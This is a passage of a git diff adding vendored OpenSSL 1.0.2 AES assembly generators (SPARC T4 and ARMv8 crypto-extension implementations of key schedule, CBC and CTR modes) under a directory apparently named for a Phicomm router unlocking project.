+	aes_dround23	%f58, %f4, %f6, %f6
+	aes_dround01_l	%f60, %f8, %f2, %f0
+	aes_dround23_l	%f62, %f8, %f2, %f2
+	aes_dround01_l	%f60, %f10, %f6, %f4
+	retl
+	aes_dround23_l	%f62, %f10, %f6, %f6
+.type	_aes192_decrypt_2x,#function
+.size	_aes192_decrypt_2x,.-_aes192_decrypt_2x
+___
+}}}
+
+if (!$::evp) {
+$code.=<<___;
+.global	AES_encrypt
+AES_encrypt=aes_t4_encrypt
+.global	AES_decrypt
+AES_decrypt=aes_t4_decrypt
+.global	AES_set_encrypt_key
+.align	32
+AES_set_encrypt_key:
+	andcc		%o2, 7, %g0		! check alignment
+	bnz,a,pn	%icc, 1f
+	mov		-1, %o0
+	brz,a,pn	%o0, 1f
+	mov		-1, %o0
+	brz,a,pn	%o2, 1f
+	mov		-1, %o0
+	andncc		%o1, 0x1c0, %g0
+	bnz,a,pn	%icc, 1f
+	mov		-2, %o0
+	cmp		%o1, 128
+	bl,a,pn		%icc, 1f
+	mov		-2, %o0
+	b		aes_t4_set_encrypt_key
+	nop
+1:	retl
+	nop
+.type	AES_set_encrypt_key,#function
+.size	AES_set_encrypt_key,.-AES_set_encrypt_key
+
+.global	AES_set_decrypt_key
+.align	32
+AES_set_decrypt_key:
+	andcc		%o2, 7, %g0		! check alignment
+	bnz,a,pn	%icc, 1f
+	mov		-1, %o0
+	brz,a,pn	%o0, 1f
+	mov		-1, %o0
+	brz,a,pn	%o2, 1f
+	mov		-1, %o0
+	andncc		%o1, 0x1c0, %g0
+	bnz,a,pn	%icc, 1f
+	mov		-2, %o0
+	cmp		%o1, 128
+	bl,a,pn		%icc, 1f
+	mov		-2, %o0
+	b		aes_t4_set_decrypt_key
+	nop
+1:	retl
+	nop
+.type	AES_set_decrypt_key,#function
+.size	AES_set_decrypt_key,.-AES_set_decrypt_key
+___
+
+my ($inp,$out,$len,$key,$ivec,$enc)=map("%o$_",(0..5));
+
+$code.=<<___;
+.globl	AES_cbc_encrypt
+.align	32
+AES_cbc_encrypt:
+	ld		[$key + 240], %g1
+	nop
+	brz		$enc, .Lcbc_decrypt
+	cmp		%g1, 12
+
+	bl,pt		%icc, aes128_t4_cbc_encrypt
+	nop
+	be,pn		%icc, aes192_t4_cbc_encrypt
+	nop
+	ba		aes256_t4_cbc_encrypt
+	nop
+
+.Lcbc_decrypt:
+	bl,pt		%icc, aes128_t4_cbc_decrypt
+	nop
+	be,pn		%icc, aes192_t4_cbc_decrypt
+	nop
+	ba		aes256_t4_cbc_decrypt
+	nop
+.type	AES_cbc_encrypt,#function
+.size	AES_cbc_encrypt,.-AES_cbc_encrypt
+___
+}
+$code.=<<___;
+.asciz	"AES for SPARC T4, David S. Miller, Andy Polyakov"
+.align	4
+___
+
+&emit_assembler();
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesv8-armx.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesv8-armx.pl
new file mode 100755
index 0000000..1e93f86
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesv8-armx.pl
@@ -0,0 +1,962 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# This module implements support for ARMv8 AES instructions. The
+# module is endian-agnostic in sense that it supports both big- and
+# little-endian cases. As does it support both 32- and 64-bit modes
+# of operation. Latter is achieved by limiting amount of utilized
+# registers to 16, which implies additional NEON load and integer
+# instructions. This has no effect on mighty Apple A7, where results
+# are literally equal to the theoretical estimates based on AES
+# instruction latencies and issue rates. On Cortex-A53, an in-order
+# execution core, this costs up to 10-15%, which is partially
+# compensated by implementing dedicated code path for 128-bit
+# CBC encrypt case. On Cortex-A57 parallelizable mode performance
+# seems to be limited by sheer amount of NEON instructions...
+#
+# Performance in cycles per byte processed with 128-bit key:
+#
+#		CBC enc		CBC dec		CTR
+# Apple A7	2.39		1.20		1.20
+# Cortex-A53	2.45		1.87		1.94
+# Cortex-A57	3.64		1.34		1.32
+
+$flavour = shift;
+open STDOUT,">".shift;
+
+$prefix="aes_v8";
+
+$code=<<___;
+#include "arm_arch.h"
+
+#if __ARM_MAX_ARCH__>=7
+.text
+___
+$code.=".arch	armv8-a+crypto\n"			if ($flavour =~ /64/);
+$code.=".arch	armv7-a\n.fpu	neon\n.code	32\n"	if ($flavour !~ /64/);
+		#^^^^^^ this is done to simplify adoption by not depending
+		#	on latest binutils.
+
+# Assembler mnemonics are an eclectic mix of 32- and 64-bit syntax,
+# NEON is mostly 32-bit mnemonics, integer - mostly 64. Goal is to
+# maintain both 32- and 64-bit codes within single module and
+# transliterate common code to either flavour with regex vodoo.
+#
+{{{
+my ($inp,$bits,$out,$ptr,$rounds)=("x0","w1","x2","x3","w12");
+my ($zero,$rcon,$mask,$in0,$in1,$tmp,$key)=
+	$flavour=~/64/? map("q$_",(0..6)) : map("q$_",(0..3,8..10));
+
+
+$code.=<<___;
+.align	5
+rcon:
+.long	0x01,0x01,0x01,0x01
+.long	0x0c0f0e0d,0x0c0f0e0d,0x0c0f0e0d,0x0c0f0e0d	// rotate-n-splat
+.long	0x1b,0x1b,0x1b,0x1b
+
+.globl	${prefix}_set_encrypt_key
+.type	${prefix}_set_encrypt_key,%function
+.align	5
+${prefix}_set_encrypt_key:
+.Lenc_key:
+___
+$code.=<<___	if ($flavour =~ /64/);
+	stp	x29,x30,[sp,#-16]!
+	add	x29,sp,#0
+___
+$code.=<<___;
+	mov	$ptr,#-1
+	cmp	$inp,#0
+	b.eq	.Lenc_key_abort
+	cmp	$out,#0
+	b.eq	.Lenc_key_abort
+	mov	$ptr,#-2
+	cmp	$bits,#128
+	b.lt	.Lenc_key_abort
+	cmp	$bits,#256
+	b.gt	.Lenc_key_abort
+	tst	$bits,#0x3f
+	b.ne	.Lenc_key_abort
+
+	adr	$ptr,rcon
+	cmp	$bits,#192
+
+	veor	$zero,$zero,$zero
+	vld1.8	{$in0},[$inp],#16
+	mov	$bits,#8		// reuse $bits
+	vld1.32	{$rcon,$mask},[$ptr],#32
+
+	b.lt	.Loop128
+	b.eq	.L192
+	b	.L256
+
+.align	4
+.Loop128:
+	vtbl.8	$key,{$in0},$mask
+	vext.8	$tmp,$zero,$in0,#12
+	vst1.32	{$in0},[$out],#16
+	aese	$key,$zero
+	subs	$bits,$bits,#1
+
+	veor	$in0,$in0,$tmp
+	vext.8	$tmp,$zero,$tmp,#12
+	veor	$in0,$in0,$tmp
+	vext.8	$tmp,$zero,$tmp,#12
+	 veor	$key,$key,$rcon
+	veor	$in0,$in0,$tmp
+	vshl.u8	$rcon,$rcon,#1
+	veor	$in0,$in0,$key
+	b.ne	.Loop128
+
+	vld1.32	{$rcon},[$ptr]
+
+	vtbl.8	$key,{$in0},$mask
+	vext.8	$tmp,$zero,$in0,#12
+	vst1.32	{$in0},[$out],#16
+	aese	$key,$zero
+
+	veor	$in0,$in0,$tmp
+	vext.8	$tmp,$zero,$tmp,#12
+	veor	$in0,$in0,$tmp
+	vext.8	$tmp,$zero,$tmp,#12
+	 veor	$key,$key,$rcon
+	veor	$in0,$in0,$tmp
+	vshl.u8	$rcon,$rcon,#1
+	veor	$in0,$in0,$key
+
+	vtbl.8	$key,{$in0},$mask
+	vext.8	$tmp,$zero,$in0,#12
+	vst1.32	{$in0},[$out],#16
+	aese	$key,$zero
+
+	veor	$in0,$in0,$tmp
+	vext.8	$tmp,$zero,$tmp,#12
+	veor	$in0,$in0,$tmp
+	vext.8	$tmp,$zero,$tmp,#12
+	 veor	$key,$key,$rcon
+	veor	$in0,$in0,$tmp
+	veor	$in0,$in0,$key
+	vst1.32	{$in0},[$out]
+	add	$out,$out,#0x50
+
+	mov	$rounds,#10
+	b	.Ldone
+
+.align	4
+.L192:
+	vld1.8	{$in1},[$inp],#8
+	vmov.i8	$key,#8			// borrow $key
+	vst1.32	{$in0},[$out],#16
+	vsub.i8	$mask,$mask,$key	// adjust the mask
+
+.Loop192:
+	vtbl.8	$key,{$in1},$mask
+	vext.8	$tmp,$zero,$in0,#12
+	vst1.32	{$in1},[$out],#8
+	aese	$key,$zero
+	subs	$bits,$bits,#1
+
+	veor	$in0,$in0,$tmp
+	vext.8	$tmp,$zero,$tmp,#12
+	veor	$in0,$in0,$tmp
+	vext.8	$tmp,$zero,$tmp,#12
+	veor	$in0,$in0,$tmp
+
+	vdup.32	$tmp,${in0}[3]
+	veor	$tmp,$tmp,$in1
+	 veor	$key,$key,$rcon
+	vext.8	$in1,$zero,$in1,#12
+	vshl.u8	$rcon,$rcon,#1
+	veor	$in1,$in1,$tmp
+	veor	$in0,$in0,$key
+	veor	$in1,$in1,$key
+	vst1.32	{$in0},[$out],#16
+	b.ne	.Loop192
+
+	mov	$rounds,#12
+	add	$out,$out,#0x20
+	b	.Ldone
+
+.align	4
+.L256:
+	vld1.8	{$in1},[$inp]
+	mov	$bits,#7
+	mov	$rounds,#14
+	vst1.32	{$in0},[$out],#16
+
+.Loop256:
+	vtbl.8	$key,{$in1},$mask
+	vext.8	$tmp,$zero,$in0,#12
+	vst1.32	{$in1},[$out],#16
+	aese	$key,$zero
+	subs	$bits,$bits,#1
+
+	veor	$in0,$in0,$tmp
+	vext.8	$tmp,$zero,$tmp,#12
+	veor	$in0,$in0,$tmp
+	vext.8	$tmp,$zero,$tmp,#12
+	 veor	$key,$key,$rcon
+	veor	$in0,$in0,$tmp
+	vshl.u8	$rcon,$rcon,#1
+	veor	$in0,$in0,$key
+	vst1.32	{$in0},[$out],#16
+	b.eq	.Ldone
+
+	vdup.32	$key,${in0}[3]		// just splat
+	vext.8	$tmp,$zero,$in1,#12
+	aese	$key,$zero
+
+	veor	$in1,$in1,$tmp
+	vext.8	$tmp,$zero,$tmp,#12
+	veor	$in1,$in1,$tmp
+	vext.8	$tmp,$zero,$tmp,#12
+	veor	$in1,$in1,$tmp
+
+	veor	$in1,$in1,$key
+	b	.Loop256
+
+.Ldone:
+	str	$rounds,[$out]
+	mov	$ptr,#0
+
+.Lenc_key_abort:
+	mov	x0,$ptr			// return value
+	`"ldr	x29,[sp],#16"		if ($flavour =~ /64/)`
+	ret
+.size	${prefix}_set_encrypt_key,.-${prefix}_set_encrypt_key
+
+.globl	${prefix}_set_decrypt_key
+.type	${prefix}_set_decrypt_key,%function
+.align	5
+${prefix}_set_decrypt_key:
+___
+$code.=<<___	if ($flavour =~ /64/);
+	stp	x29,x30,[sp,#-16]!
+	add	x29,sp,#0
+___
+$code.=<<___	if ($flavour !~ /64/);
+	stmdb	sp!,{r4,lr}
+___
+$code.=<<___;
+	bl	.Lenc_key
+
+	cmp	x0,#0
+	b.ne	.Ldec_key_abort
+
+	sub	$out,$out,#240		// restore original $out
+	mov	x4,#-16
+	add	$inp,$out,x12,lsl#4	// end of key schedule
+
+	vld1.32	{v0.16b},[$out]
+	vld1.32	{v1.16b},[$inp]
+	vst1.32	{v0.16b},[$inp],x4
+	vst1.32	{v1.16b},[$out],#16
+
+.Loop_imc:
+	vld1.32	{v0.16b},[$out]
+	vld1.32	{v1.16b},[$inp]
+	aesimc	v0.16b,v0.16b
+	aesimc	v1.16b,v1.16b
+	vst1.32	{v0.16b},[$inp],x4
+	vst1.32	{v1.16b},[$out],#16
+	cmp	$inp,$out
+	b.hi	.Loop_imc
+
+	vld1.32	{v0.16b},[$out]
+	aesimc	v0.16b,v0.16b
+	vst1.32	{v0.16b},[$inp]
+
+	eor	x0,x0,x0		// return value
+.Ldec_key_abort:
+___
+$code.=<<___	if ($flavour !~ /64/);
+	ldmia	sp!,{r4,pc}
+___
+$code.=<<___	if ($flavour =~ /64/);
+	ldp	x29,x30,[sp],#16
+	ret
+___
+$code.=<<___;
+.size	${prefix}_set_decrypt_key,.-${prefix}_set_decrypt_key
+___
+}}}
+{{{
+sub gen_block () {
+my $dir = shift;
+my ($e,$mc) = $dir eq "en" ? ("e","mc") : ("d","imc");
+my ($inp,$out,$key)=map("x$_",(0..2));
+my $rounds="w3";
+my ($rndkey0,$rndkey1,$inout)=map("q$_",(0..3));
+
+$code.=<<___;
+.globl	${prefix}_${dir}crypt
+.type	${prefix}_${dir}crypt,%function
+.align	5
+${prefix}_${dir}crypt:
+	ldr	$rounds,[$key,#240]
+	vld1.32	{$rndkey0},[$key],#16
+	vld1.8	{$inout},[$inp]
+	sub	$rounds,$rounds,#2
+	vld1.32	{$rndkey1},[$key],#16
+
+.Loop_${dir}c:
+	aes$e	$inout,$rndkey0
+	vld1.32	{$rndkey0},[$key],#16
+	aes$mc	$inout,$inout
+	subs	$rounds,$rounds,#2
+	aes$e	$inout,$rndkey1
+	vld1.32	{$rndkey1},[$key],#16
+	aes$mc	$inout,$inout
+	b.gt	.Loop_${dir}c
+
+	aes$e	$inout,$rndkey0
+	vld1.32	{$rndkey0},[$key]
+	aes$mc	$inout,$inout
+	aes$e	$inout,$rndkey1
+	veor	$inout,$inout,$rndkey0
+
+	vst1.8	{$inout},[$out]
+	ret
+.size	${prefix}_${dir}crypt,.-${prefix}_${dir}crypt
+___
+}
+&gen_block("en");
+&gen_block("de");
+}}}
+{{{
+my ($inp,$out,$len,$key,$ivp)=map("x$_",(0..4)); my $enc="w5";
+my ($rounds,$cnt,$key_,$step,$step1)=($enc,"w6","x7","x8","x12");
+my ($dat0,$dat1,$in0,$in1,$tmp0,$tmp1,$ivec,$rndlast)=map("q$_",(0..7));
+
+my ($dat,$tmp,$rndzero_n_last)=($dat0,$tmp0,$tmp1);
+
+### q8-q15	preloaded key schedule
+
+$code.=<<___;
+.globl	${prefix}_cbc_encrypt
+.type	${prefix}_cbc_encrypt,%function
+.align	5
+${prefix}_cbc_encrypt:
+___
+$code.=<<___	if ($flavour =~ /64/);
+	stp	x29,x30,[sp,#-16]!
+	add	x29,sp,#0
+___
+$code.=<<___	if ($flavour !~ /64/);
+	mov	ip,sp
+	stmdb	sp!,{r4-r8,lr}
+	vstmdb	sp!,{d8-d15}            @ ABI specification says so
+	ldmia	ip,{r4-r5}		@ load remaining args
+___
+$code.=<<___;
+	subs	$len,$len,#16
+	mov	$step,#16
+	b.lo	.Lcbc_abort
+	cclr	$step,eq
+
+	cmp	$enc,#0			// en- or decrypting?
+	ldr	$rounds,[$key,#240]
+	and	$len,$len,#-16
+	vld1.8	{$ivec},[$ivp]
+	vld1.8	{$dat},[$inp],$step
+
+	vld1.32	{q8-q9},[$key]		// load key schedule...
+	sub	$rounds,$rounds,#6
+	add	$key_,$key,x5,lsl#4	// pointer to last 7 round keys
+	sub	$rounds,$rounds,#2
+	vld1.32	{q10-q11},[$key_],#32
+	vld1.32	{q12-q13},[$key_],#32
+	vld1.32	{q14-q15},[$key_],#32
+	vld1.32	{$rndlast},[$key_]
+
+	add	$key_,$key,#32
+	mov	$cnt,$rounds
+	b.eq	.Lcbc_dec
+
+	cmp	$rounds,#2
+	veor	$dat,$dat,$ivec
+	veor	$rndzero_n_last,q8,$rndlast
+	b.eq	.Lcbc_enc128
+
+.Loop_cbc_enc:
+	aese	$dat,q8
+	vld1.32	{q8},[$key_],#16
+	aesmc	$dat,$dat
+	subs	$cnt,$cnt,#2
+	aese	$dat,q9
+	vld1.32	{q9},[$key_],#16
+	aesmc	$dat,$dat
+	b.gt	.Loop_cbc_enc
+
+	aese	$dat,q8
+	aesmc	$dat,$dat
+	 subs	$len,$len,#16
+	aese	$dat,q9
+	aesmc	$dat,$dat
+	 cclr	$step,eq
+	aese	$dat,q10
+	aesmc	$dat,$dat
+	 add	$key_,$key,#16
+	aese	$dat,q11
+	aesmc	$dat,$dat
+	 vld1.8	{q8},[$inp],$step
+	aese	$dat,q12
+	aesmc	$dat,$dat
+	 veor	q8,q8,$rndzero_n_last
+	aese	$dat,q13
+	aesmc	$dat,$dat
+	 vld1.32 {q9},[$key_],#16	// re-pre-load rndkey[1]
+	aese	$dat,q14
+	aesmc	$dat,$dat
+	aese	$dat,q15
+
+	 mov	$cnt,$rounds
+	veor	$ivec,$dat,$rndlast
+	vst1.8	{$ivec},[$out],#16
+	b.hs	.Loop_cbc_enc
+
+	b	.Lcbc_done
+
+.align	5
+.Lcbc_enc128:
+	vld1.32	{$in0-$in1},[$key_]
+	aese	$dat,q8
+	aesmc	$dat,$dat
+	b	.Lenter_cbc_enc128
+.Loop_cbc_enc128:
+	aese	$dat,q8
+	aesmc	$dat,$dat
+	 vst1.8	{$ivec},[$out],#16
+.Lenter_cbc_enc128:
+	aese	$dat,q9
+	aesmc	$dat,$dat
+	 subs	$len,$len,#16
+	aese	$dat,$in0
+	aesmc	$dat,$dat
+	 cclr	$step,eq
+	aese	$dat,$in1
+	aesmc	$dat,$dat
+	aese	$dat,q10
+	aesmc	$dat,$dat
+	aese	$dat,q11
+	aesmc	$dat,$dat
+	 vld1.8	{q8},[$inp],$step
+	aese	$dat,q12
+	aesmc	$dat,$dat
+	aese	$dat,q13
+	aesmc	$dat,$dat
+	aese	$dat,q14
+	aesmc	$dat,$dat
+	 veor	q8,q8,$rndzero_n_last
+	aese	$dat,q15
+	veor	$ivec,$dat,$rndlast
+	b.hs	.Loop_cbc_enc128
+
+	vst1.8	{$ivec},[$out],#16
+	b	.Lcbc_done
+___
+{
+my ($dat2,$in2,$tmp2)=map("q$_",(10,11,9));
+$code.=<<___;
+.align	5
+.Lcbc_dec:
+	vld1.8	{$dat2},[$inp],#16
+	subs	$len,$len,#32		// bias
+	add	$cnt,$rounds,#2
+	vorr	$in1,$dat,$dat
+	vorr	$dat1,$dat,$dat
+	vorr	$in2,$dat2,$dat2
+	b.lo	.Lcbc_dec_tail
+
+	vorr	$dat1,$dat2,$dat2
+	vld1.8	{$dat2},[$inp],#16
+	vorr	$in0,$dat,$dat
+	vorr	$in1,$dat1,$dat1
+	vorr	$in2,$dat2,$dat2
+
+.Loop3x_cbc_dec:
+	aesd	$dat0,q8
+	aesd	$dat1,q8
+	aesd	$dat2,q8
+	vld1.32	{q8},[$key_],#16
+	aesimc	$dat0,$dat0
+	aesimc	$dat1,$dat1
+	aesimc	$dat2,$dat2
+	subs	$cnt,$cnt,#2
+	aesd	$dat0,q9
+	aesd	$dat1,q9
+	aesd	$dat2,q9
+	vld1.32	{q9},[$key_],#16
+	aesimc	$dat0,$dat0
+	aesimc	$dat1,$dat1
+	aesimc	$dat2,$dat2
+	b.gt	.Loop3x_cbc_dec
+
+	aesd	$dat0,q8
+	aesd	$dat1,q8
+	aesd	$dat2,q8
+	 veor	$tmp0,$ivec,$rndlast
+	aesimc	$dat0,$dat0
+	aesimc	$dat1,$dat1
+	aesimc	$dat2,$dat2
+	 veor	$tmp1,$in0,$rndlast
+	aesd	$dat0,q9
+	aesd	$dat1,q9
+	aesd	$dat2,q9
+	 veor	$tmp2,$in1,$rndlast
+	 subs	$len,$len,#0x30
+	aesimc	$dat0,$dat0
+	aesimc	$dat1,$dat1
+	aesimc	$dat2,$dat2
+	 vorr	$ivec,$in2,$in2
+	 mov.lo	x6,$len			// x6, $cnt, is zero at this point
+	aesd	$dat0,q12
+	aesd	$dat1,q12
+	aesd	$dat2,q12
+	 add	$inp,$inp,x6		// $inp is adjusted in such way that
+					// at exit from the loop $dat1-$dat2
+					// are loaded with last "words"
+	aesimc	$dat0,$dat0
+	aesimc	$dat1,$dat1
+	aesimc	$dat2,$dat2
+	 mov	$key_,$key
+	aesd	$dat0,q13
+	aesd	$dat1,q13
+	aesd	$dat2,q13
+	 vld1.8	{$in0},[$inp],#16
+	aesimc	$dat0,$dat0
+	aesimc	$dat1,$dat1
+	aesimc	$dat2,$dat2
+	 vld1.8	{$in1},[$inp],#16
+	aesd	$dat0,q14
+	aesd	$dat1,q14
+	aesd	$dat2,q14
+	 vld1.8	{$in2},[$inp],#16
+	aesimc	$dat0,$dat0
+	aesimc	$dat1,$dat1
+	aesimc	$dat2,$dat2
+	 vld1.32 {q8},[$key_],#16	// re-pre-load rndkey[0]
+	aesd	$dat0,q15
+	aesd	$dat1,q15
+	aesd	$dat2,q15
+
+	 add	$cnt,$rounds,#2
+	veor	$tmp0,$tmp0,$dat0
+	veor	$tmp1,$tmp1,$dat1
+	veor	$dat2,$dat2,$tmp2
+	 vld1.32 {q9},[$key_],#16	// re-pre-load rndkey[1]
+	 vorr	$dat0,$in0,$in0
+	vst1.8	{$tmp0},[$out],#16
+	 vorr	$dat1,$in1,$in1
+	vst1.8	{$tmp1},[$out],#16
+	vst1.8	{$dat2},[$out],#16
+	 vorr	$dat2,$in2,$in2
+	b.hs	.Loop3x_cbc_dec
+
+	cmn	$len,#0x30
+	b.eq	.Lcbc_done
+	nop
+
+.Lcbc_dec_tail:
+	aesd	$dat1,q8
+	aesd	$dat2,q8
+	vld1.32	{q8},[$key_],#16
+	aesimc	$dat1,$dat1
+	aesimc	$dat2,$dat2
+	subs	$cnt,$cnt,#2
+	aesd	$dat1,q9
+	aesd	$dat2,q9
+	vld1.32	{q9},[$key_],#16
+	aesimc	$dat1,$dat1
+	aesimc	$dat2,$dat2
+	b.gt	.Lcbc_dec_tail
+
+	aesd	$dat1,q8
+	aesd	$dat2,q8
+	aesimc	$dat1,$dat1
+	aesimc	$dat2,$dat2
+	aesd	$dat1,q9
+	aesd	$dat2,q9
+	aesimc	$dat1,$dat1
+	aesimc	$dat2,$dat2
+	aesd	$dat1,q12
+	aesd	$dat2,q12
+	aesimc	$dat1,$dat1
+	aesimc	$dat2,$dat2
+	 cmn	$len,#0x20
+	aesd	$dat1,q13
+	aesd	$dat2,q13
+	aesimc	$dat1,$dat1
+	aesimc	$dat2,$dat2
+	 veor	$tmp1,$ivec,$rndlast
+	aesd	$dat1,q14
+	aesd	$dat2,q14
+	aesimc	$dat1,$dat1
+	aesimc	$dat2,$dat2
+	 veor	$tmp2,$in1,$rndlast
+	aesd	$dat1,q15
+	aesd	$dat2,q15
+	b.eq	.Lcbc_dec_one
+	veor	$tmp1,$tmp1,$dat1
+	veor	$tmp2,$tmp2,$dat2
+	 vorr	$ivec,$in2,$in2
+	vst1.8	{$tmp1},[$out],#16
+	vst1.8	{$tmp2},[$out],#16
+	b	.Lcbc_done
+
+.Lcbc_dec_one:
+	veor	$tmp1,$tmp1,$dat2
+	 vorr	$ivec,$in2,$in2
+	vst1.8	{$tmp1},[$out],#16
+
+.Lcbc_done:
+	vst1.8	{$ivec},[$ivp]
+.Lcbc_abort:
+___
+}
+$code.=<<___	if ($flavour !~ /64/);
+	vldmia	sp!,{d8-d15}
+	ldmia	sp!,{r4-r8,pc}
+___
+$code.=<<___	if ($flavour =~ /64/);
+	ldr	x29,[sp],#16
+	ret
+___
+$code.=<<___;
+.size	${prefix}_cbc_encrypt,.-${prefix}_cbc_encrypt
+___
+}}}
+{{{
+my ($inp,$out,$len,$key,$ivp)=map("x$_",(0..4));
+my ($rounds,$cnt,$key_)=("w5","w6","x7");
+my ($ctr,$tctr0,$tctr1,$tctr2)=map("w$_",(8..10,12));
+my $step="x12";		# aliases with $tctr2
+
+my ($dat0,$dat1,$in0,$in1,$tmp0,$tmp1,$ivec,$rndlast)=map("q$_",(0..7));
+my ($dat2,$in2,$tmp2)=map("q$_",(10,11,9));
+
+my ($dat,$tmp)=($dat0,$tmp0);
+
+### q8-q15	preloaded key schedule
+
+$code.=<<___;
+.globl	${prefix}_ctr32_encrypt_blocks
+.type	${prefix}_ctr32_encrypt_blocks,%function
+.align	5
+${prefix}_ctr32_encrypt_blocks:
+___
+$code.=<<___	if ($flavour =~ /64/);
+	stp		x29,x30,[sp,#-16]!
+	add		x29,sp,#0
+___
+$code.=<<___	if ($flavour !~ /64/);
+	mov		ip,sp
+	stmdb		sp!,{r4-r10,lr}
+	vstmdb		sp!,{d8-d15}            @ ABI specification says so
+	ldr		r4, [ip]		@ load remaining arg
+___
+$code.=<<___;
+	ldr		$rounds,[$key,#240]
+
+	ldr		$ctr, [$ivp, #12]
+	vld1.32		{$dat0},[$ivp]
+
+	vld1.32		{q8-q9},[$key]		// load key schedule...
+	sub		$rounds,$rounds,#4
+	mov		$step,#16
+	cmp		$len,#2
+	add		$key_,$key,x5,lsl#4	// pointer to last 5 round keys
+	sub		$rounds,$rounds,#2
+	vld1.32		{q12-q13},[$key_],#32
+	vld1.32		{q14-q15},[$key_],#32
+	vld1.32		{$rndlast},[$key_]
+	add		$key_,$key,#32
+	mov		$cnt,$rounds
+	cclr		$step,lo
+#ifndef __ARMEB__
+	rev		$ctr, $ctr
+#endif
+	vorr		$dat1,$dat0,$dat0
+	add		$tctr1, $ctr, #1
+	vorr		$dat2,$dat0,$dat0
+	add		$ctr, $ctr, #2
+	vorr		$ivec,$dat0,$dat0
+	rev		$tctr1, $tctr1
+	vmov.32		${dat1}[3],$tctr1
+	b.ls		.Lctr32_tail
+	rev		$tctr2, $ctr
+	sub		$len,$len,#3		// bias
+	vmov.32		${dat2}[3],$tctr2
+	b		.Loop3x_ctr32
+
+.align	4
+.Loop3x_ctr32:
+	aese		$dat0,q8
+	aese		$dat1,q8
+	aese		$dat2,q8
+	vld1.32		{q8},[$key_],#16
+	aesmc		$dat0,$dat0
+	aesmc		$dat1,$dat1
+	aesmc		$dat2,$dat2
+	subs		$cnt,$cnt,#2
+	aese		$dat0,q9
+	aese		$dat1,q9
+	aese		$dat2,q9
+	vld1.32		{q9},[$key_],#16
+	aesmc		$dat0,$dat0
+	aesmc		$dat1,$dat1
+	aesmc		$dat2,$dat2
+	b.gt		.Loop3x_ctr32
+
+	aese		$dat0,q8
+	aese		$dat1,q8
+	aese		$dat2,q8
+	 mov		$key_,$key
+	aesmc		$tmp0,$dat0
+	 vld1.8		{$in0},[$inp],#16
+	aesmc		$tmp1,$dat1
+	aesmc		$dat2,$dat2
+	 vorr		$dat0,$ivec,$ivec
+	aese		$tmp0,q9
+	 vld1.8		{$in1},[$inp],#16
+	aese		$tmp1,q9
+	aese		$dat2,q9
+	 vorr		$dat1,$ivec,$ivec
+	aesmc		$tmp0,$tmp0
+	 vld1.8		{$in2},[$inp],#16
+	aesmc		$tmp1,$tmp1
+	aesmc		$tmp2,$dat2
+	 vorr		$dat2,$ivec,$ivec
+	 add		$tctr0,$ctr,#1
+	aese		$tmp0,q12
+	aese		$tmp1,q12
+	aese		$tmp2,q12
+	 veor		$in0,$in0,$rndlast
+	 add		$tctr1,$ctr,#2
+	aesmc		$tmp0,$tmp0
+	aesmc		$tmp1,$tmp1
+	aesmc		$tmp2,$tmp2
+	 veor		$in1,$in1,$rndlast
+	 add		$ctr,$ctr,#3
+	aese		$tmp0,q13
+	aese		$tmp1,q13
+	aese		$tmp2,q13
+	 veor		$in2,$in2,$rndlast
+	 rev		$tctr0,$tctr0
+	aesmc		$tmp0,$tmp0
+	 vld1.32	 {q8},[$key_],#16	// re-pre-load rndkey[0]
+	aesmc		$tmp1,$tmp1
+	aesmc		$tmp2,$tmp2
+	 vmov.32	${dat0}[3], $tctr0
+	 rev		$tctr1,$tctr1
+	aese		$tmp0,q14
+	aese		$tmp1,q14
+	aese		$tmp2,q14
+	 vmov.32	${dat1}[3], $tctr1
+	 rev		$tctr2,$ctr
+	aesmc		$tmp0,$tmp0
+	aesmc		$tmp1,$tmp1
+	aesmc		$tmp2,$tmp2
+	 vmov.32	${dat2}[3], $tctr2
+	 subs		$len,$len,#3
+	aese		$tmp0,q15
+	aese		$tmp1,q15
+	aese		$tmp2,q15
+
+	 mov		$cnt,$rounds
+	veor		$in0,$in0,$tmp0
+	veor		$in1,$in1,$tmp1
+	veor		$in2,$in2,$tmp2
+	 vld1.32	 {q9},[$key_],#16	// re-pre-load rndkey[1]
+	vst1.8		{$in0},[$out],#16
+	vst1.8		{$in1},[$out],#16
+	vst1.8		{$in2},[$out],#16
+	b.hs		.Loop3x_ctr32
+
+	adds		$len,$len,#3
+	b.eq		.Lctr32_done
+	cmp		$len,#1
+	mov		$step,#16
+	cclr		$step,eq
+
+.Lctr32_tail:
+	aese		$dat0,q8
+	aese		$dat1,q8
+	vld1.32		{q8},[$key_],#16
+	aesmc		$dat0,$dat0
+	aesmc		$dat1,$dat1
+	subs		$cnt,$cnt,#2
+	aese		$dat0,q9
+	aese		$dat1,q9
+	vld1.32		{q9},[$key_],#16
+	aesmc		$dat0,$dat0
+	aesmc		$dat1,$dat1
+	b.gt		.Lctr32_tail
+
+	aese		$dat0,q8
+	aese		$dat1,q8
+	aesmc		$dat0,$dat0
+	aesmc		$dat1,$dat1
+	aese		$dat0,q9
+	aese		$dat1,q9
+	aesmc		$dat0,$dat0
+	aesmc		$dat1,$dat1
+	 vld1.8		{$in0},[$inp],$step
+	aese		$dat0,q12
+	aese		$dat1,q12
+	 vld1.8		{$in1},[$inp]
+	aesmc		$dat0,$dat0
+	aesmc		$dat1,$dat1
+	aese		$dat0,q13
+	aese		$dat1,q13
+	aesmc		$dat0,$dat0
+	aesmc		$dat1,$dat1
+	aese		$dat0,q14
+	aese		$dat1,q14
+	 veor		$in0,$in0,$rndlast
+	aesmc		$dat0,$dat0
+	aesmc		$dat1,$dat1
+	 veor		$in1,$in1,$rndlast
+	aese		$dat0,q15
+	aese		$dat1,q15
+
+	cmp		$len,#1
+	veor		$in0,$in0,$dat0
+	veor		$in1,$in1,$dat1
+	vst1.8		{$in0},[$out],#16
+	b.eq		.Lctr32_done
+	vst1.8		{$in1},[$out]
+
+.Lctr32_done:
+___
+$code.=<<___	if ($flavour !~ /64/);
+	vldmia		sp!,{d8-d15}
+	ldmia		sp!,{r4-r10,pc}
+___
